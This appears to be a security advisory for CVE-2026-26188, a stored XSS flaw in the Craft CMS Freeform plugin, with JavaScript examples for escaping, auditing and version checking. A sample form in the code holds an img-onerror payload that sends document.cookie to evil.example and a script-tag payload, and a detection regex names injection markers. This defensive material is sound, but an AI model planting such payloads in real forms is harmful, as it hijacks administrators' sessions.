Platform: php
Component: solspace/craft-freeform
Fixed in: 5.0.1, 5.14.7
CVE-2026-26188 describes a Cross-Site Scripting (XSS) vulnerability within the solspace/craft-freeform plugin for Craft CMS. This vulnerability allows authenticated, low-privilege users—those capable of creating or editing forms—to inject arbitrary HTML and JavaScript code. The impact is primarily limited to the Craft CMS Control Panel (CP), specifically affecting admin users who view form builder and integration screens. The vulnerability affects versions of solspace/craft-freeform up to and including 5.9.9, with a fix available in version 5.14.7.
The vulnerability stems from rendering user-controlled form labels and integration metadata with dangerouslySetInnerHTML without sanitization. A user with permission to create or edit forms can set a field label or an integration setting to a string containing a JavaScript payload, and that string is stored as entered. When an administrator opens the form builder or integration screens in the Craft CP, the stored payload executes in the administrator's browser, inside the administrator's authenticated session. This can lead to session hijacking, credential theft, and defacement of the Craft CMS administration interface. Because the script runs with the privileges of whichever admin views the page, it can drive any action that admin session is allowed to perform in the CP, potentially compromising the entire Craft CMS installation if further exploits are chained.
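To make the rendering defect concrete, the following is an added example (not code from the solspace/craft-freeform plugin or from the advisory). It simulates the verbatim interpolation that dangerouslySetInnerHTML performs on a stored label next to an escaping renderer, and includes an audit helper that flags stored labels or integration settings containing markup, which is what an administrator would want to run over existing forms. The form definition and its property names (`handle`, `label`, `integrations`) are constructed for the example and do not reflect Freeform's real data model.

```javascript
// Added example, not code from the solspace/craft-freeform plugin.
// Vulnerable rendering vs. hardened rendering of a user-controlled label,
// plus an audit helper for stored form data. All data below is constructed.

// Vulnerable: the label is interpolated into HTML unchanged, which is
// effectively what passing a raw string to dangerouslySetInnerHTML does.
function renderLabelUnsafe(label) {
  return `<label>${label}</label>`;
}

// Escape the characters that can change meaning in HTML text or attributes.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Hardened: same output shape, but the label can no longer close the tag,
// open a new element, or introduce an event handler.
function renderLabelSafe(label) {
  return `<label>${escapeHtml(label)}</label>`;
}

// Audit: flag values that contain a tag opener, an on*= handler attribute,
// or a javascript: URL. A plain "<" followed by a digit or space is allowed,
// so labels such as "Price < 5 & more" are not reported.
const MARKUP = /<\s*\/?\s*[a-z!?]|\bon[a-z]+\s*=|javascript\s*:/i;

function findSuspiciousLabels(form) {
  const hits = [];
  for (const field of form.fields || []) {
    if (MARKUP.test(field.label)) {
      hits.push({ form: form.name, handle: field.handle, value: field.label });
    }
  }
  for (const [key, value] of Object.entries(form.integrations || {})) {
    if (MARKUP.test(value)) {
      hits.push({ form: form.name, handle: `integration:${key}`, value });
    }
  }
  return hits;
}

// Constructed sample: one benign field, one field with an injected payload,
// and one integration setting carrying a script tag.
const sampleForm = {
  name: "Contact",
  fields: [
    { handle: "email", label: "Email address" },
    {
      handle: "msg",
      label: "Message<img src=x onerror=\"fetch('//evil.example/?c='+document.cookie)\">",
    },
  ],
  integrations: { listName: "Newsletter <script>alert(1)</script>" },
};

console.log(renderLabelUnsafe(sampleForm.fields[1].label)); // payload survives
console.log(renderLabelSafe(sampleForm.fields[1].label));   // payload neutralised
console.log(findSuspiciousLabels(sampleForm));              // two hits
```

The audit regex is deliberately loose (it will also match a label such as "Question=", which an admin can dismiss on review); missing a stored payload is the costlier error here.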
CVE-2026-26188 was publicly disclosed on January 22, 2026. While no active exploitation campaigns have been publicly reported at the time of writing, the ease of exploitation and the potential impact make it a likely target for opportunistic attackers. The vulnerability is not currently listed on CISA KEV. Public proof-of-concept exploits are expected to emerge as the vulnerability gains wider awareness.
Organizations using Craft CMS with the solspace/craft-freeform plugin, particularly those with multiple administrators or users who have the ability to create and edit forms, are at risk. Shared hosting environments where multiple Craft CMS installations share the same server resources could also be affected if one installation is compromised.
• composer (Craft CMS plugin source):
grep -r "dangerouslySetInnerHTML" /path/to/craft-freeform/
A hit only shows that the rendering pattern is present in the plugin's front-end code; it does not by itself confirm that the installed version is the vulnerable one. Compare the installed version against 5.14.7.
• generic web:
curl -I https://your-craft-site.com/admin/actions/forms/builder | grep -i 'X-XSS-Protection'
X-XSS-Protection is a legacy browser-filter header that modern browsers ignore; its presence or absence says nothing about whether this plugin is patched, so treat this as a response-header inventory step, not a vulnerability test. Unauthenticated requests to CP URLs will normally be redirected to the login page.
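Because neither check above establishes whether the installed version is patched, here is an added example (not from the advisory or the vendor) that reads a composer.lock document and classifies the installed solspace/craft-freeform version against the bounds the advisory gives: affected through 5.9.9, fixed in 5.14.7. Versions between those two are not described by the advisory, so the helper reports them separately rather than calling them safe. The lock-file content is constructed inline; on a real install read the file with fs.readFileSync("composer.lock", "utf8").

```javascript
// Added example: classify the installed solspace/craft-freeform version
// from composer.lock. Version bounds are taken from the advisory text.

const PACKAGE = "solspace/craft-freeform";
const LAST_AFFECTED = "5.9.9"; // "up to and including 5.9.9"
const FIXED = "5.14.7";        // "fix available in version 5.14.7"

// Compare dotted numeric versions component by component. A plain string
// comparison would get this wrong: "5.14.7" < "5.9.9" lexically.
function compareVersions(a, b) {
  const pa = a.replace(/^v/, "").split(".").map(Number);
  const pb = b.replace(/^v/, "").split(".").map(Number);
  const n = Math.max(pa.length, pb.length);
  for (let i = 0; i < n; i++) {
    const x = pa[i] || 0;
    const y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

function classifyVersion(version) {
  if (compareVersions(version, FIXED) >= 0) return "fixed";
  if (compareVersions(version, LAST_AFFECTED) <= 0) return "affected";
  // Between 5.9.9 and 5.14.7: not covered by the advisory text, so do not
  // assume it is safe; upgrade to the fixed version anyway.
  return "unverified-upgrade";
}

// Look in both the production and dev package lists of a composer.lock.
function checkComposerLock(lockJson) {
  const lock = JSON.parse(lockJson);
  const pkgs = [...(lock.packages || []), ...(lock["packages-dev"] || [])];
  const entry = pkgs.find((p) => p.name === PACKAGE);
  if (!entry) return { installed: false };
  return { installed: true, version: entry.version, status: classifyVersion(entry.version) };
}

// Constructed composer.lock fragment for the example.
const sampleLock = JSON.stringify({
  packages: [
    { name: "craftcms/cms", version: "5.5.3" },
    { name: "solspace/craft-freeform", version: "5.9.2" },
  ],
  "packages-dev": [],
});

console.log(checkComposerLock(sampleLock)); // status: "affected"
```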
Exploit Status
EPSS: 0.03% (10th percentile)
CISA SSVC
The primary mitigation for CVE-2026-26188 is to upgrade to solspace/craft-freeform version 5.14.7 or later, which includes the sanitization fix for the rendering of labels and integration metadata. If upgrading is not immediately feasible, restrict form creation and editing, and access to the form builder and integration screens, to trusted administrators, since the injection point is the form-editing permission itself. A Web Application Firewall with rules for HTML/JavaScript injection can add a layer of defense, but only if it inspects authenticated Control Panel traffic, because the payload is submitted through the CP by a logged-in user rather than through a public form. After upgrading, review existing form labels and integration settings for injected markup: a payload stored before the upgrade remains in the database, and while the patched plugin no longer renders it as HTML, it should still be removed.
Update the Solspace Freeform plugin to version 5.14.7 or later. This version fixes the stored Cross-Site Scripting (XSS) vulnerability. The update can be performed through the Craft CMS control panel.
CVE-2026-26188 is a stored Cross-Site Scripting (XSS) vulnerability in the solspace/craft-freeform plugin for Craft CMS, allowing authenticated users who can create or edit forms to inject script that executes in the admin panel of whoever views the affected form.
You are affected if you are using solspace/craft-freeform version 5.9.9 or earlier. Check your plugin versions and upgrade immediately.
Upgrade to solspace/craft-freeform version 5.14.7 or later to patch the vulnerability. This resolves the insecure rendering of user-controlled data.
While no active exploitation campaigns have been publicly reported, the vulnerability's ease of exploitation makes it a potential target. Monitor your systems closely.
Refer to the solspace website and Craft CMS security advisories for the official announcement and details regarding this vulnerability.